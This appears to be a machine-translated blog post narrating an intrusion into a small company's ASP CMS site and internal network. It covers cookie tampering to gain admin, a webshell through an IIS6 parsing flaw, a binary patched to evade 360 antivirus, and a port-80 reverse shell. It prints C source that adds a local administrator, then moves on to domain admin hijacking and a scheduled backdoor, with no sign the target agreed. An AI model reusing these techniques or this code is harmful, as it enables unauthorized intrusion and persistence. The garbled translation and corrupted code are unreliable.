One-stop channel for getting webshell to intranet penetration

In fact, compared to my article, I think the question is more domineering. Haha. Let's start today's article.

First of all, my target station is a small studio company. Relatively small. The website is asp cms. asp has

Compared with the vulnerabilities of the second egg, the previous article has been written, so it will not be emphasized. First, register a user.

Then we use Google cookie to modify the plug-in. We change the value to admin.

 

Change the value of ID to 1.

In this way, we can modify the admin password.

Aspcms takes shell and does not write template modification. The iis6 parsing vulnerability is exploited.

Let's execute the net user command to check the user. Failed. Obviously

I saw 360 anti-virus software again. Why is 360 installed on the server? Egg pain

In this case, we need to rebound a shell, but this shell function is too scum. Wood has this function. Another problem is that the server only opens port 80 to external users, and other ports are not open. In addition, a webshell cannot be called back when it is used to reverse the shell. In this way, we will not be able to get the reverse shell. But won't we be able to rebound? Otherwise. We can reuse ports, that is, the reverse shell also uses port 80, so we need to use a small program. But it seems that they cannot help. Let's stop it. No kill 360. I just added a shell and changed it. I have forgotten this because I haven't done it for years.

I randomly found a shell and added it. We changed JBE to JA. OK, no kill

Good. Upload the file to the server and run it.

The next step is to take the port. We listen to 80 locally and then send a packet to the server. Obtain shell

 

We will add a user to break through the 360 anti-black wall. /Add and/ad are of the same nature. Therefore, we directly add/ad without blocking. Of course, you can also compile C code.

// Code by Pnig0s1992

// Date: Maid, 17

# Include <stdio. h>

# Include <Windows. h>

# Include <lm. h>

 

# Pragma comment (lib, "Netapi32.lib ")

 

Int AddUser (LPWSTR lpUsername, LPWSTR lpPassword, LPWSTR lpServerName );

Int SetGroup (LPWSTR lpUsername, LPWSTR lpServerName, LPWSTR lpGroupName );

BOOL ImprovePriv (LPWSTR name );

 

Int main (INT argc, char * argv [])

{

BOOL bResult = ImprovePriv (SE_MACHINE_ACCOUNT_NAME );

If (argc <3)

{

Printf ("\ nCode by Pnig0s1992 ″);

Printf ("\ nUsage :");

Printf ("\ n \ t % s UserName Password", argv [0]);

Printf ("\ n \ tRemark: Default add to Group: Administrators .");

Return-1;

}

If (bResult)

{

Printf ("Successfully promote priv !");

} Else

{

Printf ("Failed promote priv .");

Return-1;

}

Int Namesize = MultiByteToWideChar (CP_ACP, 0, argv [1],-1, NULL, 0 );

Wchar_t * wUserName = new wchar_t [Namesize + 1];

If (! MultiByteToWideChar (CP_ACP, 0, argv [1],-1, wUserName, Namesize ))

{

Return false;

}

Int Passsize = MultiByteToWideChar (CP_ACP, 0, argv [2],-1, NULL, 0 );

Wchar_t * wPassword = new wchar_t [Passsize + 1];

If (! MultiByteToWideChar (CP_ACP, 0, argv [2],-1, wPassword, Passsize ))

{

Return false;

}

LPTSTR lpName = wUserName;

LPTSTR lpPassword = wPassword;

LPWSTR l1_vname = NULL;

LPWSTR lpGroupName = L "Administrators ";

AddUser (lpName, lpPassword, lw.vname );

SetGroup (lpName, lw.vname, lpGroupName );

Return 0;

}

 

BOOL ImprovePriv (LPWSTR name)

{

HANDLE hToken;

If (! OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, & hToken ))

{

Printf ("\ nGet process token failed. (% d)", GetLastError ());

Return FALSE;

}

TOKEN_PRIVILEGES tkp;

Tkp. PrivilegeCount = 1;

If (! LookupPrivilegeValue (NULL, name, & tkp. Privileges [0]. Luid ))

{

Printf ("\ nLookup process priv failed. (% d)", GetLastError ());

Return FALSE;

}

Tkp. Privileges [0]. Attributes = SE_PRIVILEGE_ENABLED;

If (! AdjustTokenPrivileges (hToken, FALSE, & tkp, 0, NULL, NULL ))

{

Printf ("\ nAjust process priv failed. (% d)", GetLastError ());

Return FALSE;

}

CloseHandle (hToken );

Return TRUE;

}

 

Int AddUser (LPWSTR lpUsername, LPWSTR lpPassword, LPWSTR lpServerName)

{

USER_INFO_1 ui;

DWORD dwLevel = 1;

DWORD dwError = 0;

NET_API_STATUS nStatus;

Ui. usri1_name = lpUsername;

Ui. usrimo-password = lpPassword;

Ui. usrisponpriv = USER_PRIV_USER;

Ui. usri#home_dir = NULL;

Ui. usrisponcomment = NULL;

Ui. usriw.flags = UF_SCRIPT;

Ui. usrisponscript_path = NULL;

NStatus = NetUserAdd (lpServerName, dwLevel, (LPBYTE) & ui, & dwError );

If (nStatus = NERR_Success)

{

Printf ("\ nAdd user: % S successfully !", LpUsername );

} Else

{

Printf ("\ nAdd user failed: % d.", nStatus );

}

Return 0;

}

 

Int SetGroup (LPWSTR lpUsername, LPWSTR lpServerName, LPWSTR lpGroupName)

{

NET_API_STATUS nStatus;

LOCALGROUP_MEMBERS_INFO_3 lgui;

Lgui. lgrmi3_domainandname = lpUsername;

NStatus = NetLocalGroupAddMembers (lpServerName, lpGroupName, 3, (LPBYTE) & lgui, 1 );

 

If (nStatus = NERR_Success)

{

Printf ("\ nSuccessfully set USER: % S to GROUP: % S !", LpUsername, lpGroupName );

} Else if (nStatus = NERR_GroupNotFound)

{

Printf ("\ nCan't find such a group: % S.", lpGroupName );

} Else

{

Printf ("\ nSet GROUP: % S failed.", lpGroupName );

}

Return 0;

}

Well .. Okay. Let's continue.

With a user, we can sniff. But unfortunately. No.

Since we can't take it, let's look at the Intranet penetration.

A windows Executable backdoor.

Then we call the module to listen and obtain a session.

 

Next we will conduct Intranet penetration and call a module

Then let's look at the domain and find the domain management

Let's hijack domain management.

Obtain the shell, and then let's look at the domain.

Time for Domain Management

 

Then we plan to execute our backdoor program two minutes later.

OK to obtain the session. Then you have domain control, you know